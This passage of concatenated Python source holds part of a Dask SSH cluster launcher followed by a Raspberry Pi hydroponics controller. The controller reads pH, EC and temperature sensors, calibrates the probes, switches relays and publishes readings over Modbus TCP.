Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug('stdout from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : {output}'.format(label=cmd_dict['label'],
output=line))
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug('stderr from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL + '{output}'.format(output=line) + bcolors.ENDC)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL +
"remote process exited with exit status " +
str(exit_status) + bcolors.ENDC)
return True
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict['input_queue'].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b'\x03') # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None):
cmd = '{python} -m distributed.cli.dask_scheduler --port {port}'.format(
python=remote_python or sys.executable, port=port, logdir=logdir)
# Optionally re-direct stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}:{port}.log'.format(addr=addr,
port=port, logdir=logdir)
# Format output labels we can prepend to each line of output, and create
# a 'status' key to keep track of jobs that terminate prematurely.
label = (bcolors.BOLD +
'scheduler {addr}:{port}'.format(addr=addr, port=port) +
bcolors.ENDC)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': addr, 'port': port,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
def start_worker(logdir, scheduler_addr, scheduler_port, worker_addr, nthreads, nprocs,
ssh_username, ssh_port, ssh_private_key, nohost,
memory_limit,
worker_port,
nanny_port,
remote_python=None):
cmd = ('{python} -m distributed.cli.dask_worker '
'{scheduler_addr}:{scheduler_port} '
'--nthreads {nthreads} --nprocs {nprocs} ')
if not nohost:
cmd += ' --host {worker_addr} '
if memory_limit:
cmd += '--memory-limit {memory_limit} '
if worker_port:
cmd += '--worker-port {worker_port} '
if nanny_port:
cmd += '--nanny-port {nanny_port} '
cmd = cmd.format(
python=remote_python or sys.executable,
scheduler_addr=scheduler_addr,
scheduler_port=scheduler_port,
worker_addr=worker_addr,
nthreads=nthreads,
nprocs=nprocs,
memory_limit=memory_limit,
worker_port=worker_port,
nanny_port=nanny_port)
# Optionally redirect stdout and stderr to a logfile
if logdir is not None:
cmd = 'mkdir -p {logdir} && '.format(logdir=logdir) + cmd
cmd += '&> {logdir}/dask_scheduler_{addr}.log'.format(
addr=worker_addr, logdir=logdir)
label = 'worker {addr}'.format(addr=worker_addr)
# Create a command dictionary, which contains everything we need to run and
# interact with this command.
input_queue = Queue()
output_queue = Queue()
cmd_dict = {'cmd': cmd, 'label': label, 'address': worker_addr,
'input_queue': input_queue, 'output_queue': output_queue,
'ssh_username': ssh_username, 'ssh_port': ssh_port,
'ssh_private_key': ssh_private_key}
# Start the thread
thread = Thread(target=async_ssh, args=[cmd_dict])
thread.daemon = True
thread.start()
return merge(cmd_dict, {'thread': thread})
class SSHCluster(object):
def __init__(self, scheduler_addr, scheduler_port, worker_addrs, nthreads=0, nprocs=1,
ssh_username=None, ssh_port=22, ssh_private_key=None,
nohost=False, logdir=None, remote_python=None,
memory_limit=None, worker_port=None, nanny_port=None):
self.scheduler_addr = scheduler_addr
self.scheduler_port = scheduler_port
self.nthreads = nthreads
self.nprocs = nprocs
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.nohost = nohost
self.remote_python = remote_python
self.memory_limit = memory_limit
self.worker_port = worker_port
self.nanny_port = nanny_port
# Generate a universal timestamp to use for log files
import datetime
if logdir is not None:
logdir = os.path.join(logdir, "dask-ssh_" + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S"))
print(bcolors.WARNING + 'Output will be redirected to logfiles '
'stored locally on individual worker nodes under "{logdir}".'.format(logdir=logdir)
+ bcolors.ENDC)
self.logdir = logdir
# Keep track of all running threads
self.threads = []
# Start the scheduler node
self.scheduler = start_scheduler(logdir, scheduler_addr,
scheduler_port, ssh_username, ssh_port,
ssh_private_key, remote_python)
# Start worker nodes
self.workers = []
for i, addr in enumerate(worker_addrs):
self.add_worker(addr)
@gen.coroutine
def _start(self):
pass
@property
def scheduler_address(self):
return '%s:%d' % (self.scheduler_addr, self.scheduler_port)
def monitor_remote_processes(self):
# Form a list containing all processes, since we treat them equally from here on out.
all_processes = [self.scheduler] + self.workers
try:
while True:
for process in all_processes:
while not process['output_queue'].empty():
print(process['output_queue'].get())
# Kill some time and free up CPU before starting the next sweep
# through the processes.
time.sleep(0.1)
# end while true
except KeyboardInterrupt:
pass # Return execution to the calling process
def add_worker(self, address):
self.workers.append(start_worker(self.logdir, self.scheduler_addr,
self.scheduler_port, address,
self.nthreads, self.nprocs,
self.ssh_username, self.ssh_port,
self.ssh_private_key, self.nohost,
self.memory_limit,
self.worker_port,
self.nanny_port,
self.remote_python))
def shutdown(self):
all_processes = [self.scheduler] + self.workers
for process in all_processes:
process['input_queue'].put('shutdown')
process['thread'].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
|
BOOT_GUI10Key.py
|
import RPi.GPIO as GPIO
import tkinter as tk
import tkinter.font as TkFont
from tkinter import *
from tkinter import ttk
import time
#from signal import pause
import threading
from AtlasOEM_PH import AtlasOEM_PH
from AtlasOEM_EC import AtlasOEM_EC
import time
from tkinter import messagebox
global fullscreen
from PIL import ImageTk,Image
from tkinter import *
global ph_HIGH
global ph_LOW
import time
import board
import digitalio
import adafruit_max31865
import os
import datetime as dt
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from tkinter import Tk, Canvas, Frame, BOTH
#from tkinter.messagebox import showinfo
import time
import threading
from AtlasOEM_PH import AtlasOEM_PH
from AtlasOEM_EC import AtlasOEM_EC
import time
import time
import board
import digitalio
import adafruit_max31865
import os
import datetime as dt
from pymodbus.server.sync import StartTcpServer, ModbusTcpServer
from AtlasOEM_PH import AtlasOEM_PH
import time
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from twisted.internet.task import LoopingCall
from twisted.internet import reactor
import threading
import datetime as dt
import matplotlib.pyplot as plt
import matplotlib.animation as animation
#import Read_PH_OEM
PHT = 0
ECT = 0
global number1
#number1 = 10
number = 0
number1 = 0
number2 = 0
number3 = 0
number4 = 0
ec_val = 0
ph_val = 0
#var10 = 0
GPIO.setwarnings(False)
PH_HIGH = 4
PH_LOW = 17
EC_HIGH = 27
EC_LOW = 22
GPIO.setup(4, GPIO.OUT)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
GPIO.setup(27, GPIO.OUT)
GPIO.output(EC_HIGH, GPIO.HIGH)
spi = board.SPI()
cs = digitalio.DigitalInOut(board.D5) # Chip select of the MAX31865 board.
sensor = adafruit_max31865.MAX31865(spi, cs)
def helloCallBack1():
import Read_PH_OEM
# Create figure for plotting
PHTrend = plt.figure()
ax = PHTrend.add_subplot(1, 1, 1)
xs = []
ys = []
# Initialize communication with TMP102
# This function is called periodically from FuncAnimation
def animate(i, xs, ys):
# Read temperature (Celsius) from TMP102
PH = round(Read_PH_OEM.main(), 2)
# Add x and y to lists
xs.append(dt.datetime.now().strftime('%H:%M:%S.%f'))
ys.append(PH)
# Limit x and y lists to 20 items
xs = xs[-20:]
ys = ys[-20:]
# Draw x and y lists
ax.clear()
ax.plot(xs, ys)
plt.ylim(0,14)
plt.plot(xs, ys, marker='o', linestyle='--', color='g')
# Format plot
plt.xticks(rotation=45, ha='right')
plt.subplots_adjust(bottom=0.30)
plt.title('PH over Time')
plt.ylabel('PH')
# Set up plot to call animate() function periodically
ani = animation.FuncAnimation(PHTrend, animate, fargs=(xs, ys), interval=1000)
plt
plt.show()
def helloCallBack2():
import Read_EC_OEM
PHTrend = plt.figure()
ax = PHTrend.add_subplot(1, 1, 1)
xs = []
ys = []
# Initialize communication with TMP102
# This function is called periodically from FuncAnimation
def animate(i, xs, ys):
# Read temperature (Celsius) from TMP102
PH = round(Read_EC_OEM.main(), 2)
# Add x and y to lists
xs.append(dt.datetime.now().strftime('%H:%M:%S.%f'))
ys.append(PH)
# Limit x and y lists to 20 items
xs = xs[-20:]
ys = ys[-20:]
# Draw x and y lists
ax.clear()
ax.plot(xs, ys)
plt.ylim(0,5000)
plt.plot(xs, ys, marker='o', linestyle='--', color='g')
# Format plot
plt.xticks(rotation=45, ha='right')
plt.subplots_adjust(bottom=0.30)
plt.title('EC over Time')
plt.ylabel('EC')
# Set up plot to call animate() function periodically
ani = animation.FuncAnimation(PHTrend, animate, fargs=(xs, ys), interval=1000)
plt.show()
def helloCallBack3():
channel1 = 4
channel2 = 17
channel3 = 27
channel4 = 22
GPIO.setup(channel1, GPIO.OUT)
GPIO.output(channel1, GPIO.LOW)
GPIO.setup(channel2, GPIO.OUT)
GPIO.output(channel2, GPIO.LOW)
GPIO.setup(channel3, GPIO.OUT)
GPIO.output(channel3, GPIO.LOW)
GPIO.setup(channel4, GPIO.OUT)
GPIO.output(channel4, GPIO.LOW)
#logging.basicConfig()
#log = logging.getLogger()
#log.setLevel(logging.DEBUG)
def run_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
# di=block, co=block, hr=block, ir=block
# block = ModbusSequentialDataBlock(0x00, [123]*0x20)
# store = ModbusSlaveContext(hr=block)
block1 = ModbusSequentialDataBlock(0x00, [100] * 0x0F)
#block2 = ModbusSequentialDataBlock(0x02, [323] * 0x1F)
block2 = ModbusSequentialDataBlock(0x00, [1] * 0x04),
store2 = ModbusSlaveContext(hr=block1, di=block2)
slaves = {
0x02: store2,
}
context = ModbusServerContext(slaves=slaves, single=False)
# print(block1.values)
# print(block2.values)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
# If you don't set this or any fields, they are defaulted to empty strings.
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'Pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/riptideio/pymodbus/'
identity.ProductName = 'Pymodbus Server'
identity.ModelName = 'Pymodbus Server'
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
# Tcp:
# server = StartTcpServer(context, identity=identity, address=('0.0.0.0', 255))
# start server in a separate thread so that is not blocking
# server.start_server()
# to access the blocks for slave 1
# store_1=server.context[1]
# to read from the block
# print("------")
# print(store_1.getValues(4,0,32))
# to write to the block
# store_1.setValues(0x0F, 0, [111, 121, 122, 123, 124])
# Type-2 Implementationt
interval = 2
# loop = LoopingCall(f=updatevalues, a=(context,))
# loop.start(time, now=True)
server = ModbusTcpServer(context, identity=identity,
address=('0.0.0.0', 5060))
t = threading.Thread(target=server.serve_forever, daemon=True)
t.start()
#q = threading.Thread(target=updatevalues, daemon=True)
#q.start()
#z = threading.Thread(target=run_server, daemon=True)
#z.start()
loop = LoopingCall(f=updatevalues, a=server)
loop.start(interval, now=True)
reactor.run()
def updatevalues(a):
PH = AtlasOEM_PH(name = "PH") # create an OEM PH object
EC = AtlasOEM_EC(name = "EC") # create an OEM EC object
#DO = AtlasOEM_DO(name = "DO") # create an OEM DO object
PH.write_active_hibernate(1) # tell the circuits to start taking readings
EC.write_active_hibernate(1)
#DO.write_active_hibernate(1)
def get_OEM_reading(OEM_circuit, readfunction): # creates a closure to take readings for each circuit
reading = [1] # we use a list to approximate a static variable to cache previous readings
def OEM_reading_closure(): # make a custom function to do the readings
if OEM_circuit.read_new_reading_available(): # if we have a new reading
reading[0] = readfunction() # get it from the circuit
#print("OEM " + OEM_circuit.get_name() + \
# " reading: " + str(reading)) # print the reading
OEM_circuit.write_new_reading_available(0) # then clear the new reading register
# so the circuit can set the register
# high again when it acquires a new reading
return reading[0] # return the value in the list
return OEM_reading_closure # return the custom function without calling it, so we can call it when we want readings
def get_all_EC_values(): # we can gt all 3 EC values by returning them in a list
EC_val = EC.read_EC_reading()
#TDS_val = EC.read_TDS_reading()
#sal_val = EC.read_salinitiy_reading()
return EC_val #,TDS_val, sal_val]
read_pH = get_OEM_reading(PH, PH.read_PH_reading) #assign the closures so we can call them to get readings
read_EC = get_OEM_reading(EC, get_all_EC_values)
#read_pH = float("{0:.1f}".format(read_pHraw))
#read_EC = float("{0:.1f}".format(ead_ECraw))
#read_DO = get_OEM_reading(DO, DO.read_DO_reading)
time.sleep(.5)
# give circuits time to get the initial readings
def read_temp():
#global temp
# Read temperature.
tempraw = sensor.temperature
temp = float("{0:.1f}".format(tempraw))
# Print the value.
#print("Temperature: {0:0.1f}C".format(temp))
# Delay for a second.
#time.sleep(.5)
return temp
while True:
ec_val = read_EC() #take readings from the closures
ph_val = read_pH()
temp_val=read_temp()
time.sleep(10)
#do_val = read_DO()
#var2.set(f'PH:{ph_val:}')
#var1.set(f'EC:{ec_val:}')
#var20.set(f'Temperature:{temp_val:}')
#print("EC:" + str(ec_val), "Temperature:" + str(temp) # print the readings
# + "\t PH:" + str(ph_val))
ECT = ec_val
ecint=float(ECT)
if(ecint > 10000):
ecint = 1500
format_float1 = "{:.0f}".format(ecint)
ECACT = int(format_float1)
#ECNEW = int(float(ECACT))
#ec1 = "{:.0f}".format(ECNEW)
#ec2 = int(ECACT)
#print(ecint)
#print(ECACT)
#ec1 =format_float
#ec2 = int(ec1)
#print(ec2)
Tempgate = temp_val
temp1 = "{:.0f}".format(Tempgate)
temp2 = int(temp1)
#print(temp2)
###################################################################################################################
pH_reading = ph_val
#ph = pH_reading*10
#pH1 = float(pH_reading)
#format_float = "{:.0f}".format(ph)
#pH1 =int(format_float)
#print(pH1)
#if(pH1 > 14.000 ):
# pH1 = 6.50
#print(pH1)
pH1 = pH_reading*100
pH2 = float(pH1)
if(pH2 > 1400):
pH2 = 650
format_float = "{:.0f}".format(pH2)
format_float5 = int(format_float)
#print("------------START----------")
cfuncode = 1
rfuncode = 3
wfuncode = 16
slave_id = 0x02
address = 0x00
#address1 = 0x01
contxt = a.context[slave_id]
values = contxt.getValues(3, address, count=10)
values1 = contxt.getValues(1, address, count=10)
#print(values)
DI1 = GPIO.input(channel1)
DI2 = GPIO.input(channel2)
DI3 = GPIO.input(channel3)
DI4 = GPIO.input(channel4)
contxt.setValues(1, 0x00, DI1)
contxt.setValues(1, 0x01, DI2)
contxt.setValues(1, 0x02, DI3)
contxt.setValues(1, 0x03, DI4)
contxt.setValues(3, 0x00, pH2)
contxt.setValues(3, 0x01, ec2)
contxt.setValues(3, 0x02, temp2)
#contxt.setValues(3, 0x02, ecint)
#print("-------------END-------------")
if __name__ == "__main__":
while True:
run_server()
updatevalues()
time.sleep(10)
def submit1():
PH = AtlasOEM_PH(name = "PH") # create an OEM PH object
EC = AtlasOEM_EC(name = "EC") # create an OEM EC object
#DO = AtlasOEM_DO(name = "DO") # create an OEM DO object
#PH.write_active_hibernate(1) # tell the circuits to start taking readings
EC.write_active_hibernate(1)
#DO.write_active_hibernate(1)
def get_OEM_reading(OEM_circuit, readfunction): # creates a closure to take readings for each circuit
reading = [1] # we use a list to approximate a static variable to cache previous readings
def OEM_reading_closure(): # make a custom function to do the readings
if OEM_circuit.read_new_reading_available(): # if we have a new reading
reading[0] = readfunction() # get it from the circuit
#print("OEM " + OEM_circuit.get_name() + \
# " reading: " + str(reading)) # print the reading
OEM_circuit.write_new_reading_available(0) # then clear the new reading register
# so the circuit can set the register
# high again when it acquires a new reading
return reading[0] # return the value in the list
return OEM_reading_closure # return the custom function without calling it, so we can call it when we want readings
def get_all_EC_values(): # we can gt all 3 EC values by returning them in a list
EC_val = EC.read_EC_reading()
#TDS_val = EC.read_TDS_reading()
#sal_val = EC.read_salinitiy_reading()
return EC_val #,TDS_val, sal_val]
#read_pH = get_OEM_reading(PH, PH.read_PH_reading) #assign the closures so we can call them to get readings
read_EC = get_OEM_reading(EC, get_all_EC_values)
#read_pH = float("{0:.1f}".format(read_pHraw))
#read_EC = float("{0:.1f}".format(ead_ECraw))
#read_DO = get_OEM_reading(DO, DO.read_DO_reading)
#time.sleep(20)
# give circuits time to get the initial readings
def read_temp():
spi = board.SPI()
cs = digitalio.DigitalInOut(board.D5) # Chip select of the MAX31865 board.
sensor = adafruit_max31865.MAX31865(spi, cs)
global temp
# Read temperature.
tempraw = sensor.temperature
temp = float("{0:.1f}".format(tempraw))
#temp2 = temp*
# Print the value.
#print("Temperature: {0:0.1f}C".format(temp))
# Delay for a second.
return temp
while True:
ec_val = read_EC() #take readings from the closures
#ph_val = read_pH()
temp_val=read_temp()
# time.sleep(10)
#do_val = read_DO()
#var2.set(f'PH:{ph_val:}')
#var1.set(f'EC:{ec_val:}')
#var20.set(f'Temperature:{temp_val:}')
#print("EC:" + str(ec_val), "Temperature:" + str(temp) # print the readings
#+ "\t PH:" + str(ph_val))
ECT = ec_val
ECT2=int(ECT)
#ECT2 = 500
#PHT = ph_val
#print(ECT2)
#print(str(PHT))
#print(str(ECT))
#print(numbr2)
#print(number1)
#GPIO.output(EC_HIGH, GPIO.LOW)
#GPIO.output(EC_HIGH, GPIO.HIGH)
#if(number == 0):
#GPIO.output(PH_LOW, GPIO.LOW)
#GPIO.output(PH_HIGH, GPIO.LOW)
#GPIO.output(EC_LOW, GPIO.LOW)
#GPIO.output(EC_HIGH, GPIO.LOW)
#elif(number1==0):
#GPIO.output(PH_LOW, GPIO.LOW)
#GPIO.output(PH_HIGH, GPIO.LOW)
#GPIO.output(EC_LOW, GPIO.LOW)
#GPIO.output(EC_HIGH, GPIO.LOW)
#elif(number2==0):
#GPIO.output(PH_LOW, GPIO.LOW)
#GPIO.output(PH_HIGH, GPIO.LOW)
#GPIO.output(EC_LOW, GPIO.LOW)
#GPIO.output(EC_HIGH, GPIO.LOW)
#elif(ECT > 0):
#GPIO.output(EC_HIGH, GPIO.HIGH)
#
def read_sensor():
PH = AtlasOEM_PH(name = "PH") # create an OEM PH object
EC = AtlasOEM_EC(name = "EC") # create an OEM EC object
#DO = AtlasOEM_DO(name = "DO") # create an OEM DO object
PH.write_active_hibernate(1) # tell the circuits to start taking readings
EC.write_active_hibernate(1)
#DO.write_active_hibernate(1)
def get_OEM_reading(OEM_circuit, readfunction): # creates a closure to take readings for each circuit
reading = [1] # we use a list to approximate a static variable to cache previous readings
def OEM_reading_closure(): # make a custom function to do the readings
if OEM_circuit.read_new_reading_available(): # if we have a new reading
reading[0] = readfunction() # get it from the circuit
#print("OEM " + OEM_circuit.get_name() + \
# " reading: " + str(reading)) # print the reading
OEM_circuit.write_new_reading_available(0) # then clear the new reading register
# so the circuit can set the register
# high again when it acquires a new reading
return reading[0] # return the value in the list
return OEM_reading_closure # return the custom function without calling it, so we can call it when we want readings
#time.sleep(10)
def get_all_EC_values(): # we can gt all 3 EC values by returning them in a list
EC_val = EC.read_EC_reading()
#TDS_val = EC.read_TDS_reading()
#sal_val = EC.read_salinitiy_reading()
return EC_val #,TDS_val, sal_val]
read_pH = get_OEM_reading(PH, PH.read_PH_reading) #assign the closures so we can call them to get readings
read_EC = get_OEM_reading(EC, get_all_EC_values)
#read_pH = float("{0:.1f}".format(read_pHraw))
#read_EC = float("{0:.1f}".format(ead_ECraw))
#read_DO = get_OEM_reading(DO, DO.read_DO_reading)
#time.sleep(10)
# give circuits time to get the initial readings
def read_temp():
#global temp
# Read temperature.
tempraw = sensor.temperature
temp = float("{0:.1f}".format(tempraw))
# Print the value.
#print("Temperature: {0:0.1f}C".format(temp))
# Delay for a second.
#time.sleep(15)
return temp
time.sleep(10)
while True:
ec_val = read_EC() #take readings from the closures
ph_val = read_pH()
temp_val=read_temp()
time.sleep(10)
ec = ec_val
ph = ph_val
ec_2 = float(ec)
if(ec_2 > 10000):
ec_2 = 1500.5
ec_1 = "{:.1f}".format(ec_2)
Temp = temp_val
Tempgate = Temp
temp1 = "{:.1f}".format(Tempgate)
pH2 = float(ph)
if(pH2 > 14.0):
pH2 = 6.5
format_float = "{:.1f}".format(pH2)
format_float7 = str(float(format_float))
#format_float5 = int(format_float)
#format_float = "{:.1f}".format(ph)
#format_float1 = "{:.0f}".format(ec)
var2.set("{}".format(format_float7))
var1.set("{}".format(ec_1))
var20.set("{}".format(temp1))
#print("EC:" + str(ec_val), "Temperature:" + str(temp) # print the readings
# + "\t PH:" + str(ph_val))
ECT = ec_val
ECT2=ECT
PHT = ph_val
PHT2 = PHT
#print(ECT2)
#print(str(PHT))
#print(str(ECT))
#time.sleep(10)
#GPIO.output(EC_HIGH, GPIO.LOW)
#GPIO.output(EC_HIGH, GPIO.HIGH)
if(number == 0):
GPIO.output(PH_LOW, GPIO.LOW)
GPIO.output(PH_HIGH, GPIO.LOW)
#GPIO.output(EC_LOW, GPIO.LOW)
#GPIO.output(EC_HIGH, GPIO.LOW)
elif(number1==0):
GPIO.output(PH_LOW, GPIO.LOW)
GPIO.output(PH_HIGH, GPIO.LOW)
#GPIO.output(EC_LOW, GPIO.LOW)
#GPIO.output(EC_HIGH, GPIO.LOW)
elif(number2==0):
#GPIO.output(PH_LOW, GPIO.LOW)
#GPIO.output(PH_HIGH, GPIO.LOW)
GPIO.output(EC_LOW, GPIO.LOW)
GPIO.output(EC_HIGH, GPIO.LOW)
elif(PHT2 < number):
GPIO.output(PH_HIGH, GPIO.HIGH)
GPIO.output(PH_LOW, GPIO.LOW)
elif(PHT2 > number1):
GPIO.output(PH_LOW, GPIO.HIGH)
GPIO.output(PH_HIGH, GPIO.LOW)
#GPIO.output(EC_LOW, GPIO.HIGH)
#elif(ECT2 > number2):
# GPIO.output(27, GPIO.HIGH)
print(number1)
#GPIO.output(EC_LOW, GPIO.HIGH)
if(ECT2 > number1):
GPIO.output(27, GPIO.LOW)
def submit(number1):
number2=numbr2.get()
number1 = int(number2)
print(number1)
def Cal_4_Mode(var3):
print("Entering CAL 4.0 Mode")
# var3.set("Please DIP the PH Probe in PH 4.0 Buffer Solution ")
#var3.set("Entering CAL 4.0 Mode")
PH = AtlasOEM_PH() # create an OEM PH object
PH.write_active_hibernate(1) # tell the circuit to start taking readings
# high again when it acquires a new reading
PH.read_calibration_data()
PH.write_calibration_request(0)
PH.write_calibration_data(4.00)
#PH.write_calibration_request(0)
#PH.write_calibration_request(3)
#PH.write_calibration_request(2)
#PH.write_calibration_request(0)
#PH.read_calibration_confirm()
#time.sleep(1)
messagebox.showinfo("Calibration 4.0", "Calibration in progress Please Wait")
time.sleep(10)
#PH.write_calibration_request(2)
pH_ReadCal = PH.read_calibration_confirm()
pH_CalData = PH.read_calibration_data()
#return self.read_32(0x08)/1000.0
print("OEM pH CAL reading: " + str(pH_CalData))
print("OEM pH CALCONF reading: " + str(pH_ReadCal))
#tk.messagebox.showinfo(title="Calibration 4.0",message="Sensor Calibrated Sucessfully")
#var3.set("Successfully Calibated LOW POINT PH 4.0")
def Cal_7_Mode(var4):
print("Entering CAL 7.0 Mode")
#var4.set("Please DIP the PH Probe in PH 7.0 Buffer Solution")
PH = AtlasOEM_PH() # create an OEM PH object
PH.write_active_hibernate(1) # tell the circuit to start taking readings
PH.read_calibration_data()
PH.write_calibration_request(1)
PH.write_calibration_data(7.00)
#PH.write_calibration_request(1)
#PH.write_calibration_request(2)
#PH.write_calibration_request(0)
#PH.read_calibration_confirm()
#time.sleep(1)
messagebox.showinfo("Calibration 7.0","Calibration in progress Please Wait")
time.sleep(10)
#PH.write_calibration_request(2)
pH_ReadCal = PH.read_calibration_confirm()
pH_CalData = PH.read_calibration_data()
#return self.read_32(0x08)/1000.0
print("OEM pH CAL reading: " + str(pH_CalData))
print("OEM pH CALCONF reading: " + str(pH_ReadCal))
#tk.messagebox.showinfo(title="Calibration 7.0",message="Sensor Calibrated Sucessfully")
#var3.set("Successfully Calibated MID POINT PH 7.0")
def Cal_10_Mode(var5):
print("Entering CAL 10.0 Mode")
#var5.set("Please DIP the PH Probe in PH 10.0 Buffer Solution")
PH = AtlasOEM_PH() # create an OEM PH object
PH.write_active_hibernate(1) # tell the circuit to start taking reading
PH.read_calibration_data()
PH.write_calibration_request(2)
PH.write_calibration_data(10.00)
#PH.write_calibration_request(2)
#PH.write_calibration_request(2)
#PH.write_calibration_request(0)
#PH.read_calibration_confirm()
#time.sleep(1)
messagebox.showinfo("Calibration 10.0","Calibration in progress Please Wait")
time.sleep(10)
#PH.write_calibration_request(2)
pH_ReadCal = PH.read_calibration_confirm()
pH_CalData = PH.read_calibration_data()
#return self.read_32(0x08)/1000.0
print("OEM pH CAL reading: " + str(pH_CalData))
print("OEM pH CALCONF reading: " + str(pH_ReadCal))
#tk.messagebox.showinfo(title="Calibration 10.0",message="Sensor Calibrated Sucessfully")
#var5.set("Successfully Calibated MID POINT PH 10.0")
def Cal_EC_Mode(var6):
print("Entering CAL EC Mode")
EC = AtlasOEM_EC(name = "EC") # create an OEM EC object
EC.write_active_hibernate(1)
if EC.read_new_reading_available(): # if we have a new reading
EC.write_new_reading_available(0) # then clear the new reading register # then clear the new reading register
EC.read_calibration_data()
EC_CalData = EC.read_calibration_data()
print("OEM EC CAL reading: " + str(EC_CalData))
EC.write_calibration_data(1413)
EC.write_calibration_request(3)
#PH.write_calibration_request(2)
#PH.write_calibration_request(0)
#PH.read_calibration_confirm()
messagebox.showinfo("Calibration EC 1413","Calibration in progress Please Wait")
#time.sleep(1)
time.sleep(10)
#PH.write_calibration_request(2)
EC_ReadCal = EC.read_calibration_confirm()
print("OEM pH CALCONF reading: " + str(EC_ReadCal))
#tk.messagebox.showinfo(title="Calibration EC",message="Sensor Calibrated Sucessfully")
#var6.set("Successfully Calibated EC 1413")
def Cal_DeletePH_Mode():
PH = AtlasOEM_PH() # create an OEM PH object
PH.write_active_hibernate(1) # tell the circuit to start taking readings
# high again when it acquires a new reading
PH.read_calibration_data()
PH.write_calibration_request(0)
PH.write_calibration_data(0)
#PH.write_calibration_request(3)
#PH.write_calibration_request(2)
#PH.write_calibration_request(0)
#PH.read_calibration_confirm()
#time.sleep(1)
time.sleep(5)
#PH.write_calibration_request(2)
pH_ReadCal = PH.read_calibration_confirm()
pH_CalData = PH.read_calibration_data()
#return self.read_32(0x08)/1000.0
print("OEM pH CAL reading: " + str(pH_CalData))
print("OEM pH CALCONF reading: " + str(pH_ReadCal))
def PH_plus():
global number
maxN = 14
number += 0.5
number = min(maxN, number)
numbr.set(text=number)
print(number)
def PH_minus():
global number
minN = 0
number -= 0.5
number = max(minN, number)
numbr.set(text=number)
print(number)
def PH_plus1():
global number1
maxN = 14
number1 += 0.5
number1 = min(maxN, number1)
label6.config(text=number1)
print(number1)
def PH_minus1():
global number1
minN = 0
number1 -= 0.5
number1 = max(minN, number1)
label6.config(text=number1)
print(number1)
def EC_plus():
global number2
maxN = 5000
number2 += 10
number2 = min(maxN, number2)
numbr2.set(text=number2)
print(number2)
def EC_minus():
global number2
minN = 0
number2 -= 10
number2 = max(minN, number2)
numbr2.set(text=number2)
print(number2)
def EC_plus1():
global number3
maxN = 5000
number3 += 0
number3 = min(maxN, number3)
label8.config(text=number3)
print(number3)
def EC_minus1():
global number3
minN = 0
number3 -= 0
number3 = max(minN, number3)
label8.config(text=number3)
print(number3)
def start_Cal4_Mode(var3):
t = threading.Thread(target=Cal_4_Mode, args=(var3,))
t.start()
def start_Cal7_Mode(var4):
t = threading.Thread(target=Cal_7_Mode, args=(var4,))
t.start()
def start_Cal10_Mode(var5):
t = threading.Thread(target=Cal_10_Mode, args=(var5,))
t.start()
def start_CalEC_Mode(var6):
t = threading.Thread(target=Cal_EC_Mode, args=(var6,))
t.start()
def start_CalDeletePH_Mode(var7):
t = threading.Thread(target=Cal_DeletePH_Mode, args=(var7,))
t.start()
#Thread(target = loop2).terminate()
# create the thread
task = threading.Thread(target=read_sensor, daemon=True)
task1 = threading.Thread(target=helloCallBack3, daemon=True)
task2 = threading.Thread(target=submit1, daemon=True)
task2.start()
task.start()
task1.start()
root = tk.Tk()
from Preload import *
##root.geometry('800x400')
#bg = PhotoImage(file = "farmfluence-Logo.png")
#canvas1 = Canvas(root, width = 800,
#height = 450)
#canvas1.grid(row=0,column=1)
#canvas1.pack(fill=Tkinter.BOTH)
# Display image
#canvas1.create_image(0, 0, image = bg, anchor = "nw")
# Add Text
#canvas1.create_text( 200, 250, text = "Welcome")
#root.geometry("1024x800")
##root.title("PH EC Controller")
#bg = PhotoImage(file ="farmfluence-Logo.png")
var2 = tk.StringVar()#PH
var1 = tk.StringVar()#EC
var20 = tk.StringVar() #Temp
var3 = tk.StringVar()
var4 = tk.StringVar()
var5 = tk.StringVar()
var6 = tk.StringVar()
